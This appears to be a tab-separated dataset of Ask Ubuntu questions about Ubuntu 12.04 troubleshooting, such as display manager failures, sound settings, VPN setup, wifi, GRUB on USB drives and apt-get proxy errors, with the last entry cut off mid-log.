162727	ubuntu 12.04 boots up into terminal ( lightdm & ati video card )	i just returned from a two-week vacation and started up my laptop , everything went fine and it installed a lot of updates ( including a kernel update . sorry for few details , i did n't really pay attention to what it did update ) . the next time i tried to start up the machine , it would n't . among the last messages there was e4rat , and when the automatic package repair ( in ubuntu-repair-mode or whatever it 's called in english - fortunately , that works ) wanted to replace it with ureadahead , i figured there 'd be some kind of incompatibility with the newest kernel . so i removed it myself ( as the automatic repair was n't able to . did it using sudo apt-get install ureadahead ubuntu-minimal , which worked fine ) , and manually removed the e4rat-preload-line in grub . problem is : it wo n't show the login-screen but instead it switches to tty1 , prompting me to log in . when looking at tty7 , it only shows me the usual startup-messages of what was started last ( no error messages visible ) . running sudo service lightdm ( re ) start freezes the entire system , same when trying to run gdm . according to the xorg.log file , fglrx works fine ( no error messages ) . /var/log/lightdm/lightdm.log states : [ +0.16s ] debug : launching process 1257 : /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch -background none ... . [ +0.73s ] debug : process 1257 exited with return value 127 [ +0.73s ] debug : x server stopped /var/log/lightdm/x-0.log states : ( ww ) fglrx : no matching device section for instance ( busid pci:0 @ 1:0:1 ) found /usr/bin/x : symbol lookup error : /usr/lib/xorg/modules/drivers/fglrx_drv.so : undefined symbol : glxinitvisuals2d i already deleted ( after backing it up ) the xorg.conf file to avoid misconfiguration . edit : /var/log/syslog states : jul 12 16:22:29 lutz kernel : [ 24.014008 ] init : lightdm main process ( 1213 ) terminated with status 1 any ideas ? thank you in advance .
162728	how to save volume settings for digital output ( s/pdif ) ?	in sound settings i can choose between analogue and digital output . when i choose `` digital output ( s/pdif ) '' i have to decrease the volume every time after i boot up . what could i do for saving these settings automatically ( at shut down ) ? these are the settings when i shut down : and it looks like this after booting : what becomes saved automatically is whether i chose analogue or digital output , and also the volume settings of analogue output become stored . card and chip , settings i do n't use an extra sound card ; i have the asrock m3n78d mainboard and lshw prints following : *-multimedia beschreibung : audio device produkt : mcp72xe/mcp72p/mcp78u/mcp78s high definition audio hersteller : nvidia corporation physische id : 7 bus-informationen : pci @ 0000:00:07.0 version : a1 breite : 32 bits uhr : 66mhz fähigkeiten : pm bus_master cap_list konfiguration : driver=snd_hda_intel latency=0 maxlatency=5 mingnt=2 ressourcen : irq:21 memory : fbd78000-fbd7bfff starting alsamixer shows me `` chip : via vt1718s '' . this is the output from aplay -l : **** liste der hardware-geräte ( playback ) **** karte 0 : nvidia [ hda nvidia ] , gerät 0 : vt1718s analog [ vt1718s analog ] sub-geräte : 1/1 sub-gerät # 0 : subdevice # 0 karte 0 : nvidia [ hda nvidia ] , gerät 1 : vt1718s digital [ vt1718s digital ] sub-geräte : 0/1 sub-gerät # 0 : subdevice # 0 karte 0 : nvidia [ hda nvidia ] , gerät 2 : vt1718s hp [ vt1718s hp ] sub-geräte : 1/1 sub-gerät # 0 : subdevice # 0 this is output from pactl stat : server-name : pulseaudio server-version : 1.1 standard-sample-angabe : s16le 2ch 44100hz standard-kanalzuordnung : front-left , front-right standard-sink : alsa_output.pci-0000_00_07.0.iec958-stereo standard-quelle : alsa_input.pci-0000_00_07.0.analog-stereo this is the output from amixer : simple mixer control 'master',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 42 mono : playback 0 [ 0 % ] [ -63.00db ] [ on ] simple mixer control 'headphone',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 42 mono : front left : playback 42 [ 100 % ] [ 0.00db ] [ on ] front right : playback 42 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'pcm',0 capabilities : pvolume penum playback channels : front left - front right limits : playback 0 - 255 mono : front left : playback 253 [ 99 % ] [ 0.40db ] front right : playback 253 [ 99 % ] [ 0.40db ] simple mixer control 'pcm loopback',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 24 [ 77 % ] [ 1.50db ] [ off ] front right : playback 24 [ 77 % ] [ 1.50db ] [ off ] simple mixer control 'front',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 42 mono : front left : playback 39 [ 93 % ] [ -4.50db ] [ on ] front right : playback 39 [ 93 % ] [ -4.50db ] [ on ] simple mixer control 'front mic',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 31 [ 100 % ] [ 12.00db ] [ off ] front right : playback 31 [ 100 % ] [ 12.00db ] [ off ] simple mixer control 'front mic boost',0 capabilities : volume penum playback channels : front left - front right capture channels : front left - front right limits : 0 - 3 front left : 3 [ 100 % ] [ 30.75db ] front right : 3 [ 100 % ] [ 30.75db ] simple mixer control 'surround',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 42 mono : front left : playback 42 [ 100 % ] [ 0.00db ] [ on ] front right : playback 42 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'center',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 42 mono : playback 42 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'lfe',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 42 mono : playback 42 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'side',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 42 mono : front left : playback 42 [ 100 % ] [ 0.00db ] [ on ] front right : playback 42 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'line',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] front right : playback 0 [ 0 % ] [ -34.50db ] [ off ] simple mixer control 'cd',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] front right : playback 0 [ 0 % ] [ -34.50db ] [ off ] simple mixer control 'iec958',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ on ] simple mixer control 'iec958 default pcm',0 capabilities : pswitch pswitch-joined penum playback channels : mono mono : playback [ on ] simple mixer control 'capture',0 capabilities : cvolume cswitch penum capture channels : front left - front right limits : capture 0 - 31 front left : capture 28 [ 90 % ] [ 25.50db ] [ on ] front right : capture 28 [ 90 % ] [ 25.50db ] [ on ] simple mixer control 'capture',1 capabilities : cvolume cswitch penum capture channels : front left - front right limits : capture 0 - 31 front left : capture 0 [ 0 % ] [ -16.50db ] [ on ] front right : capture 0 [ 0 % ] [ -16.50db ] [ on ] simple mixer control 'digital',0 capabilities : cvolume penum capture channels : front left - front right limits : capture 0 - 120 front left : capture 60 [ 50 % ] [ 0.00db ] front right : capture 60 [ 50 % ] [ 0.00db ] simple mixer control 'dynamic power-control',0 capabilities : enum items : 'disabled ' 'enabled' item0 : 'disabled' simple mixer control 'independent hp',0 capabilities : enum items : 'off ' 'on' item0 : 'off' simple mixer control 'input source',0 capabilities : cenum items : 'front mic ' 'rear mic ' 'line ' 'cd ' 'stereo mixer' item0 : 'front mic' simple mixer control 'input source',1 capabilities : cenum items : 'front mic ' 'rear mic ' 'line ' 'cd ' 'stereo mixer' item0 : 'stereo mixer' simple mixer control 'loopback mixing',0 capabilities : enum items : 'disabled ' 'enabled' item0 : 'disabled' simple mixer control 'rear mic',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 31 [ 100 % ] [ 12.00db ] [ off ] front right : playback 31 [ 100 % ] [ 12.00db ] [ off ] simple mixer control 'rear mic boost',0 capabilities : volume penum playback channels : front left - front right capture channels : front left - front right limits : 0 - 3 front left : 0 [ 0 % ] [ 0.00db ] front right : 0 [ 0 % ] [ 0.00db ] oddities when i switch to `` analogue output '' while listening to music , the speakers connected to the digital output can be used , too , but then the volume is by 100 % and i ca n't adjust it - only when i switch back to `` digital output '' or if i use alsamixer and dim `` pcm '' . when i choose `` digital output '' in audio settings and start alsamixer , changing the `` master '' volume does n't have any impact . `` s/pdif '' and `` s/pdif d '' are shown there , too , but both are set to `` 00 '' and i ca n't modify them ... when i adjust the volume to a normal level ( i.e . 40 % ) and run sudo alsactl store and reboot , the volume icon in the panel does n't show 100 % , but the sound comes with 100 % - until i scroll down above the icon : then it jumps immediately to 39 % .
162737	how to make nautilus remember the windows position ?	i ca n't see any tweak about this in dconf or compiz . can someone explain is there any way to make nautilus remember its position before the closing ? ubuntu 12.04
162740	how do i uninstall ffmpeg ?	i am using ubuntu 12.04 . i had installed ffmpeg a while ago ( so do n't clearly remember whether it was from source or repo ) . now , i am unable to uninstall it . i have tried the followin : $ sudo apt-get remove ffmpeg $ sudo apt-get purge ffmpeg i tried to find ffmpeg directory by issuing the following command : $ find / -name 'ffmpeg ' -type d this gave me /home//ffmpeg . when i changed to the directory , i found ffmpeg and ffmpeg1 , however `` sudo make uninstall '' did n't work for both the places and threw an error `` make : * no rule to make target `uninstall ' . stop. '' . that , i suppose , would mean that it was not the source from which ffmpeg was ( if ) compiled . when i issue the following command : $ ffmpeg -version i get : ffmpeg version 0.8.3-4:0.8.3-0ubuntu0.12.04.1 , copyright ( c ) 2000-2012 the libav developers built on jun 12 2012 16:37:58 with gcc 4.6.3 *** this program is deprecated *** this program is only provided for compatibility and will be removed in a future release . please use avconv instead . ffmpeg 0.8.3-4:0.8.3-0ubuntu0.12.04.1 libavutil 51 . 22 . 1 / 51 . 22 . 1 libavcodec 53 . 35 . 0 / 53 . 35 . 0 libavformat 53 . 21 . 0 / 53 . 21 . 0 libavdevice 53 . 2 . 0 / 53 . 2 . 0 libavfilter 2 . 15 . 0 / 2 . 15 . 0 libswscale 2 . 1 . 0 / 2 . 1 . 0 libpostproc 52 . 0 . 0 / 52 . 0 . 0
162742	ubuntuone fails to sync with 'file sync starting ... ' displayed	i am on 12.04 using ubuntuone-client 3.0.1-0ubuntu1.0.1 . i actually have two machines that i sync with , having the same ubuntu version and ubuntuone-client version . one is fine , the other is not . file sync has frozen within a user-defined folder under my home folder . the graphical client reports in the top-right corner : 'file sync starting ... ' , but this does n't change . i have two files with changes that show a syncing overlay in nautilus . they are both very small text files . here are some details : harb @ joan : ~ $ u1sdtool -- status state : ready connection : with user not network description : ready to connect is_connected : false is_error : false is_online : false queues : working harb @ joan : ~ $ u1sdtool -- current-transfers current uploads : 0 current downloads : 0 the status seems to suggest that i am not connected to a network , however i am connected to a network - in fact i am accessing this machine via nx . is it not working because i am connected via nx ? happy to provide other info , just not sure what would be useful .
162743	unable to add cisco vpn connection	i am setting up cisco vpn on ubuntu 12.04 , when i run into strange behavior . i have downloaded and installed the following packages : vpnc network-manager-vpnc and dependencies . when adding the connection with network manager , i am not able to save the connection - i only get this error i have tried different settings , tried importing cisco .pcf without any luck so far . errors while searching for solutions , i have stumbled upon a way to restart the network manager applet : killall nm-applet ; nm-applet & this did not solve my problems , but i noticed that a log is written to the terminal after running the command , and i think it may tell something ( no idea what , though ! ) after clicking save , these lines are written in the terminal : ( nm-applet:4079 ) : glib-gio-critical ** : g_async_initable_real_init_finish : assertion `g_simple_async_result_is_valid ( res , g_object ( initable ) , g_async_initable_real_init_async ) ' failed ** ( nm-applet:4079 ) : critical ** : dbus_g_error_has_name : assertion `error ! = null ' failed ( nm-applet:4079 ) : glib-critical ** : g_error_free : assertion `error ! = null ' failed ( nm-connection-editor:4157 ) : glib-gio-critical ** : g_async_initable_real_init_finish : assertion `g_simple_async_result_is_valid ( res , g_object ( initable ) , g_async_initable_real_init_async ) ' failed
162747	i would like to install ubuntu on a new hdd , which unzipped files do i burn to cd ?	i downloaded ubuntu 12.04 from the official site and it arrived as a zip file . unzipped and got a lot of folders , totaling up to over 700 mb . there is n't any iso image in the extracted content . so what do i burn to make a bootable ubuntu cd for my new hdd ?
162752	wifi connected to router , but no internet connection	i just got a new notebook , a thinkpad edge e530 , and installed ubuntu on it . i 'm pretty new to ubuntu . on the same laptop , running windows 7 , the wi-fi connection works fine . ethernet connection works both on win7 and on ubuntu . only wi-fi on ubuntu does not work ; it connects to the wi-fi access point but i do n't have internet access . my wireless card is intel centrino wireless-n 2230 . what can fix the problem ? edit : ifconfig -a eth0 link encap : ethernet hwaddr b8:88 : e3:30:72:34 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:43 base address:0x8000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:163 errors:0 dropped:0 overruns:0 frame:0 tx packets:163 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:10124 ( 10.1 kb ) tx bytes:10124 ( 10.1 kb ) usb0 link encap : ethernet hwaddr 02:15 : e0 : ec:01:00 up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) wlan0 link encap : ethernet hwaddr 68:5d:43:43:71 : e1 inet addr:192.168.2.101 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :6a5d:43ff : fe43:71e1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:40 errors:0 dropped:0 overruns:0 frame:0 tx packets:220 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2801 ( 2.8 kb ) tx bytes:26230 ( 26.2 kb ) route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.2.1 0.0.0.0 ug 0 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 wlan0 192.168.2.0 0.0.0.0 255.255.255.0 u 2 0 0 wlan0 cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 iwconfig lo no wireless extensions . usb0 no wireless extensions . wlan0 ieee 802.11bgn essid : '' satelite '' mode : managed frequency:2.462 ghz access point : 00:1f:1f:8d : cc:08 bit rate=1 mb/s tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=60/70 signal level=-50 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:93 invalid misc:243 missed beacon:0 eth0 no wireless extensions .
162757	disable new windows auto opening in background	skype contact list , home folder , etc . how to open them in foreground ?
162759	why my app has not been reviewed yet even if its a debian source package ?	i took part in ubuntu app showdown . in the upload app field , i uploaded text file in this format . was that good enough or did i miss something ? referring another similar question , i quote that answer '' there are two `` queues '' arb and `` commercial/paid '' . for both the review pending stage takes the longest . this is where the submission is made into a package . if you submitted debian package source ( the output of dpkg-buildpackage -s ) then this stage will take a very short time . if you did n't follow instructions and submitted a binary deb the process takes much longer as we have to deconstruct and subsequently reconstruct the .deb . if you submit a simple tarball , the packaging process is completely dependent on the complexity of the package . '' my tiny application is based on c++ and qt ( have n't used quickly which i regret now ) . it 's already packaged as a debian source package , and is available at the ppa and is successfully built into a binary debian package there . so it should take `` very short time '' unlike binary deb or tarball . can anyone give a rough estimate of how long it would take for completion of `` pending review '' state ? i 'm really sorry for being impatient .
162760	startup disk creator uncaught exception error	when creating a boot-able usb or liveusb with startup disk creator in ubuntu 12.04 , the following error message appears : installation failed an uncaught exception was raised : invalid version string 'gnu/linux' what does this mean ? is there a fix for this ?
162762	touchpad scrolling on dell inspiron 17r se ( n7220 )	i have a new dell inspiron 17r that i have installed ubuntu 12.04 on . the touchpad is recognized as a ps/2 mouse , which means that i ca n't use scrolling and that there is no `` touchpad '' tab in the mouse settings . how can i fix this ? i 've searched for the answer , but there 's very little information about 12.04 , and people keep mentioning this .deb package that i am supposed to download from http : //people.canonical.com/~sforshee/alps-touchpad/psmouse-alps-0.10/psmouse-alps-dkms_0.10_all.deb , which is a dead link .
162765	how to install crossover-pro from cd	i like to install crossover-pro_9.0.1-1_i386.deb from cd in ubuntu 12.04 . i have tried to install from gdebi package manager but package manager showing error message `` can not install python : i386 `` pl . help me to solve this problem .
162766	install packages resulted in reboot/shutdown freeze	i have installed a brand new 12.04 on my dell xps m1330 laptop . initially , it is able to reboot/shutdown normally . however , after i installed my first software , ubuntu-tweak , my laptop was frozen in the reboot/shutdown process consistently , result in a black screen . because of my suspicion , i remove and purge ubuntu-tweak , then try again . it worked this time ! it is obvious that ubuntu-tweak cause this power manager problem on my laptop . however , i have encountered another reboot/shutdown freeze after i started to install most of popular programs in the ubuntu software center . i have been force logout during the installation . after that , my laptop have the reboot/shutdown freeze constantly ! i am wondering what kind of bug would cause this problem and how to resolve it . any idea ?
162768	starting java processes with upstart	i want to start a java process using upstart . currently , on our opensuse servers , i use the system v init system to achieve this , but on our ubuntu servers i 'd rather use upstart . but i have two questions ... i have an upstart job ( a task ) that configures the server , called , say , myconfig . and in the job that starts my java processes i ostensibly have : start on stopped myconfig exec /path/to/myjavastartscript.sh myjavastartscript.sh runs 'java -classpath blah myclass ' . in system v init , starting the service runs 'nohup /path/to/myjavastartscript.sh & ' . so my first question is whether i still need to do the nohup or run-in-background with the exec command ? when running , myclass starts other java processes . in system v init , the service stop just looks for java processes owned by a certain user and kills them . my second question is how could i control the termination of these processes with upstart ?
162769	full install of ubuntu 12.04 on usb pendrive halts at grub prompt	for the last three days i have been trying to install ubuntu 12.04 lts on a kingston datatraveler micro 16gb usb pendrive ( to be called the install usb ) . the processor is a brand new intel atom d525 ( computer is brand new ) . it is a regular full install ( so i am not trying to create a live usb ) using the regular desktop installer run from another usb pendrive ( to be called the live usb ) which runs the desktop 12.04 iso . i want to use this install usb as a default for booting , no other drives are connected . i followed all steps from : how can i run ubuntu without a hard drive ? and from method 1 of : https : //wiki.ubuntu.com/liveusbpendrivepersistent/ . so basically i created a new mbr on the usb pendrive with two partitions ( ext2 mounted on / and 2gb swap ) . i have installed the bootloader ( grub ) on the /dev/sda ( i actually also tried /dev/sda1 just to see whether that would work ... ) which is the install usb ( the live usb is /dev/sdb ) . everything seemed to work perfectly fine ( live usb boots/works perfectly ) . however , when booting from the install usb i am confronted with the grub prompt instead of a menu or ubuntu booting . no message whatsoever , just the prompt . this happens everytime i try to install . entering commands in the grub prompt such as `` ls '' all end in an error : `` hd0 read error '' or `` no such partition '' . i have already tried these options : install on /dev/sda1 instead of /dev/sda ( obviously does not work , had to try ) install using ext4 instead of ext2 ( same result , as expected ) reinstall grub using boot-repair ( same result ) reinstall grub from commandline ( same result ) two complete reinstalls using a brand new ubuntu desktop iso and different tools to create the live usb pendrive ( hash checked ) ( takes ~2 hours per install including updates ... ) my guts tell me that somehow grub2 is incompatible with reading from the pendrive ( again , live usb boots fine , but i think that uses a different bootloader ) . i would like to use the install usb as a default boot drive ( as the computer is going to be online 24/7 so a slow boot is not a problem and it should work ... ) . i hope my problem is clear and that someone could help me out . i already tried googling and asking for help on the irc channel , but no result ( the guy did not know what was going on either and suggesting posting here ) . i would very much appreciate any help as i am basically out of options .
162770	changing default software for opening video files not working - any ideas ?	i used the answer to this question to change the default software for opening video files to vlc player on ubuntu 12.04 . the settings say that this is now the default player and yet whenever i play the files they are still opening with movie player . is there anything i can do to fix this or must i uninstall movie player ? ? ? ?
162773	how can quickly create new milestones/releases and upload tarball files to launchpad ?	quickly has the tendency of messing with some of the source code files ( e.g . the files in debian/ , licence stuff and so ... ) , so at time it is necessary to manually save/share/release/submitubuntu ( if not even run ! ) . i think i 'd be nice if this issue might be solved in future releases of quickly , for i believe that this is a problem for many ubuntu developers . meanwhile my question is : how can one manually reproduce the steps performed by `` quickly submitubuntu '' via the command line ? in particular , i 'm referring to the creation of a new milestone , turning it into a release , and uploading download files into it . i tried looking at quickly source code , but i found it hard to follow all those methods from different modules in the first place .
162774	lenovo z560 volume mute/unmute button always blinks while on battery . how do i stop that ?	the lenovo z560 ideapad has a row of 4 led buttons in the top right corner of the keyboard . the button on the left end of this group is the speaker mute/unmute button . usually , this light is either on or off to indicate the sound being muted or unmuted . this is how it works while the laptop is plugged in to an electrical outlet . however , when running on battery , the light remains off when the sound is muted , but it constantly blinks when the sound is unmuted . the blinking is somewhat distracting . is there any way i can make the led behave the same way when running on battery as it does when plugged in ? any system file i can edit ? all i want is for the light to always remain in either a constant on or constant off state . blinking on and off gets distracting .
162776	screen brightness of dell inspiron n4050 is not changing	i have installed all the drivers of my laptop ( dell inspiron n4050 with windows 7 professional ) and now i am trying to minimize the brightness because its too much bright light is itching me . neither fn+f4 key minimizes the brightness nor there is any option of adjustment in control panel/hardware and sound/power options . secondly video song become blurry when i switch to full screen and works well without full screen . please help me to sort this problem -- thanks in advance .
162782	apt-get update bad header line on all udpates	i tried all the solutions on this and still having an issue . i am behind a proxy so i have updated /etc/apt/apt.conf with my proxy settings and i have removed the old lists with sudo rm /var/lib/apt/lists/* -vf . however i still get the following : sudo apt-get update ign http : //gb.archive.ubuntu.com precise inrelease ign http : //gb.archive.ubuntu.com precise-updates inrelease ign http : //gb.archive.ubuntu.com precise-security inrelease ign http : //gb.archive.ubuntu.com precise-proposed inrelease ign http : //gb.archive.ubuntu.com precise-backports inrelease err http : //gb.archive.ubuntu.com precise-security release.gpg got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise-proposed release.gpg bad header line err http : //gb.archive.ubuntu.com precise release.gpg bad header line err http : //gb.archive.ubuntu.com precise-updates release.gpg bad header line err http : //gb.archive.ubuntu.com precise-backports release.gpg got a single header line over 360 chars ign http : //gb.archive.ubuntu.com precise-security release ign http : //gb.archive.ubuntu.com precise-proposed release ign http : //gb.archive.ubuntu.com precise release ign http : //gb.archive.ubuntu.com precise-updates release ign http : //gb.archive.ubuntu.com precise-backports release ign http : //gb.archive.ubuntu.com precise-security/main translationindex ign http : //gb.archive.ubuntu.com precise-security/multiverse translationindex ign http : //gb.archive.ubuntu.com precise-security/restricted translationindex ign http : //gb.archive.ubuntu.com precise-security/universe translationindex ign http : //gb.archive.ubuntu.com precise-proposed/main translationindex ign http : //gb.archive.ubuntu.com precise-proposed/multiverse translationindex ign http : //gb.archive.ubuntu.com precise-proposed/restricted translationindex ign http : //gb.archive.ubuntu.com precise-proposed/universe translationindex ign http : //gb.archive.ubuntu.com precise/multiverse translationindex ign http : //gb.archive.ubuntu.com precise/restricted translationindex ign http : //gb.archive.ubuntu.com precise/universe translationindex ign http : //gb.archive.ubuntu.com precise/main translationindex ign http : //gb.archive.ubuntu.com precise-updates/main translationindex ign http : //gb.archive.ubuntu.com precise-updates/multiverse translationindex ign http : //gb.archive.ubuntu.com precise-updates/restricted translationindex ign http : //gb.archive.ubuntu.com precise-updates/universe translationindex ign http : //gb.archive.ubuntu.com precise-backports/main translationindex ign http : //gb.archive.ubuntu.com precise-backports/multiverse translationindex ign http : //gb.archive.ubuntu.com precise-backports/restricted translationindex ign http : //gb.archive.ubuntu.com precise-backports/universe translationindex err http : //gb.archive.ubuntu.com precise-security/main sources got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise-security/restricted sources bad header line err http : //gb.archive.ubuntu.com precise-security/universe sources bad header line err http : //gb.archive.ubuntu.com precise-security/multiverse sources bad header line err http : //gb.archive.ubuntu.com precise-security/main amd64 packages bad header line err http : //gb.archive.ubuntu.com precise-security/restricted amd64 packages bad header line err http : //gb.archive.ubuntu.com precise-security/universe amd64 packages got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise-security/multiverse amd64 packages bad header line err http : //gb.archive.ubuntu.com precise-security/main i386 packages bad header line err http : //gb.archive.ubuntu.com precise-security/restricted i386 packages bad header line err http : //gb.archive.ubuntu.com precise-security/universe i386 packages got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise-security/multiverse i386 packages bad header line err http : //gb.archive.ubuntu.com precise-proposed/restricted amd64 packages got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise-proposed/main amd64 packages bad header line err http : //gb.archive.ubuntu.com precise-proposed/multiverse amd64 packages got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise-proposed/universe amd64 packages bad header line err http : //gb.archive.ubuntu.com precise-proposed/restricted i386 packages bad header line err http : //gb.archive.ubuntu.com precise-proposed/main i386 packages bad header line err http : //gb.archive.ubuntu.com precise-proposed/multiverse i386 packages bad header line err http : //gb.archive.ubuntu.com precise-proposed/universe i386 packages got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise/main sources bad header line err http : //gb.archive.ubuntu.com precise/restricted sources got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise/universe sources bad header line err http : //gb.archive.ubuntu.com precise/multiverse sources bad header line err http : //gb.archive.ubuntu.com precise/main amd64 packages got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise/restricted amd64 packages bad header line err http : //gb.archive.ubuntu.com precise/universe amd64 packages got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise/multiverse amd64 packages bad header line err http : //gb.archive.ubuntu.com precise/main i386 packages bad header line err http : //gb.archive.ubuntu.com precise/restricted i386 packages bad header line err http : //gb.archive.ubuntu.com precise/universe i386 packages bad header line err http : //gb.archive.ubuntu.com precise/multiverse i386 packages got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise-updates/main sources bad header line err http : //gb.archive.ubuntu.com precise-updates/restricted sources got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise-updates/universe sources bad header line err http : //gb.archive.ubuntu.com precise-updates/multiverse sources bad header line err http : //gb.archive.ubuntu.com precise-updates/main amd64 packages got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise-updates/restricted amd64 packages bad header line err http : //gb.archive.ubuntu.com precise-updates/universe amd64 packages got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise-updates/multiverse amd64 packages bad header line err http : //gb.archive.ubuntu.com precise-updates/main i386 packages bad header line err http : //gb.archive.ubuntu.com precise-updates/restricted i386 packages bad header line err http : //gb.archive.ubuntu.com precise-updates/universe i386 packages bad header line err http : //gb.archive.ubuntu.com precise-updates/multiverse i386 packages got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise-backports/restricted amd64 packages bad header line err http : //gb.archive.ubuntu.com precise-backports/main amd64 packages got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise-backports/multiverse amd64 packages bad header line err http : //gb.archive.ubuntu.com precise-backports/universe amd64 packages bad header line err http : //gb.archive.ubuntu.com precise-backports/restricted i386 packages got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise-backports/main i386 packages bad header line err http : //gb.archive.ubuntu.com precise-backports/multiverse i386 packages got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise-backports/universe i386 packages bad header line err http : //gb.archive.ubuntu.com precise-security/main translation-en_gb got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise-security/main translation-en bad header line err http : //gb.archive.ubuntu.com precise-security/multiverse translation-en_gb bad header line err http : //gb.archive.ubuntu.com precise-security/multiverse translation-en bad header line err http : //gb.archive.ubuntu.com precise-security/restricted translation-en_gb bad header line err http : //gb.archive.ubuntu.com precise-security/restricted translation-en got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise-security/universe translation-en_gb bad header line err http : //gb.archive.ubuntu.com precise-security/universe translation-en bad header line err http : //gb.archive.ubuntu.com precise-proposed/main translation-en_gb got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise-proposed/main translation-en bad header line err http : //gb.archive.ubuntu.com precise-proposed/multiverse translation-en_gb got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise-proposed/multiverse translation-en bad header line err http : //gb.archive.ubuntu.com precise-proposed/restricted translation-en_gb bad header line err http : //gb.archive.ubuntu.com precise-proposed/restricted translation-en bad header line err http : //gb.archive.ubuntu.com precise-proposed/universe translation-en_gb bad header line err http : //gb.archive.ubuntu.com precise-proposed/universe translation-en got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise/multiverse translation-en_gb bad header line err http : //gb.archive.ubuntu.com precise/multiverse translation-en bad header line err http : //gb.archive.ubuntu.com precise/restricted translation-en_gb got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise/restricted translation-en bad header line err http : //gb.archive.ubuntu.com precise/universe translation-en_gb got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise/universe translation-en bad header line err http : //gb.archive.ubuntu.com precise/main translation-en_gb bad header line err http : //gb.archive.ubuntu.com precise/main translation-en bad header line err http : //gb.archive.ubuntu.com precise-updates/main translation-en_gb bad header line err http : //gb.archive.ubuntu.com precise-updates/main translation-en got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise-updates/multiverse translation-en_gb bad header line err http : //gb.archive.ubuntu.com precise-updates/multiverse translation-en bad header line err http : //gb.archive.ubuntu.com precise-updates/restricted translation-en_gb got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise-updates/restricted translation-en bad header line err http : //gb.archive.ubuntu.com precise-updates/universe translation-en_gb got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise-updates/universe translation-en bad header line err http : //gb.archive.ubuntu.com precise-backports/main translation-en_gb bad header line err http : //gb.archive.ubuntu.com precise-backports/main translation-en bad header line err http : //gb.archive.ubuntu.com precise-backports/multiverse translation-en_gb bad header line err http : //gb.archive.ubuntu.com precise-backports/multiverse translation-en got a single header line over 360 chars err http : //gb.archive.ubuntu.com precise-backports/restricted translation-en_gb bad header line err http : //gb.archive.ubuntu.com precise-backports/restricted translation-en bad header line err http : //gb.archive.ubuntu.com precise-backports/universe translation-en_gb bad header line err http : //gb.archive.ubuntu.com precise-backports/universe translation-en bad header line w : failed to fetch http : 